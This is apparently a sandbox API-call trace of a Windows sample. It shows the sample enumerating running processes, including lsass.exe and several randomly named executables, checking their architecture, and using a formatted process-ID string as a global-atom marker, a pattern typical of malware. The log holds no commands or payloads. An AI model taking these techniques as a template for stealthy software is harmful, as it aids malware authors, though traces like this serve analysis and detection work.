	[0122.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.397] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.397] CloseHandle (hObject=0x698) returned 1
	[0122.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.397] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.397] CloseHandle (hObject=0x698) returned 1
	[0122.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b97a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0122.398] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.398] CloseHandle (hObject=0x698) returned 1
	[0122.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.398] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.398] CloseHandle (hObject=0x698) returned 1
	[0122.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.398] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.398] CloseHandle (hObject=0x698) returned 1
	[0122.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.399] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.399] CloseHandle (hObject=0x698) returned 1
	[0122.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.399] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.399] CloseHandle (hObject=0x698) returned 1
	[0122.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.400] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.400] CloseHandle (hObject=0x698) returned 1
	[0122.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0122.400] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.400] CloseHandle (hObject=0x698) returned 1
	[0122.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0122.400] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.400] CloseHandle (hObject=0x698) returned 1
	[0122.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.401] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetLastError () returned 0x5
	[0122.402] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.402] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0122.402] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] GetLastError () returned 0x5
	[0122.403] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.404] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetLastError () returned 0x5
	[0122.405] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.406] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0122.408] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.408] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0122.408] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0122.408] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0122.408] CloseHandle (hObject=0x698) returned 1
	[0122.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0122.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.409] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.409] CloseHandle (hObject=0x698) returned 1
	[0122.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.409] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.409] CloseHandle (hObject=0x698) returned 1
	[0122.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5b08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.409] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.409] CloseHandle (hObject=0x698) returned 1
	[0122.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.410] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.410] CloseHandle (hObject=0x698) returned 1
	[0122.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0122.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16dc8) returned 0xc0000004
	[0122.449] VirtualAlloc (lpAddress=0x0, dwSize=0x16ec8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c20000
	[0122.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c20000, Length=0x16ec8, ResultLength=0x0 | out: SystemInformation=0x3c20000, ResultLength=0x0) returned 0x0
	[0122.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0122.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5b80, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0122.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5ad8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d628, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.458] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.458] CloseHandle (hObject=0x698) returned 1
	[0122.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b68, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.459] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.459] CloseHandle (hObject=0x698) returned 1
	[0122.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399cea8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0122.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.459] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.459] CloseHandle (hObject=0x698) returned 1
	[0122.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.460] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.460] CloseHandle (hObject=0x698) returned 1
	[0122.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5a00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.460] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.460] CloseHandle (hObject=0x698) returned 1
	[0122.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.460] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.460] CloseHandle (hObject=0x698) returned 1
	[0122.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.461] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.461] CloseHandle (hObject=0x698) returned 1
	[0122.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.461] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.461] CloseHandle (hObject=0x698) returned 1
	[0122.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.462] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.462] CloseHandle (hObject=0x698) returned 1
	[0122.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5ad8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.462] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.462] CloseHandle (hObject=0x698) returned 1
	[0122.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.462] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.463] CloseHandle (hObject=0x698) returned 1
	[0122.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.463] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.463] CloseHandle (hObject=0x698) returned 1
	[0122.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.463] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.463] CloseHandle (hObject=0x698) returned 1
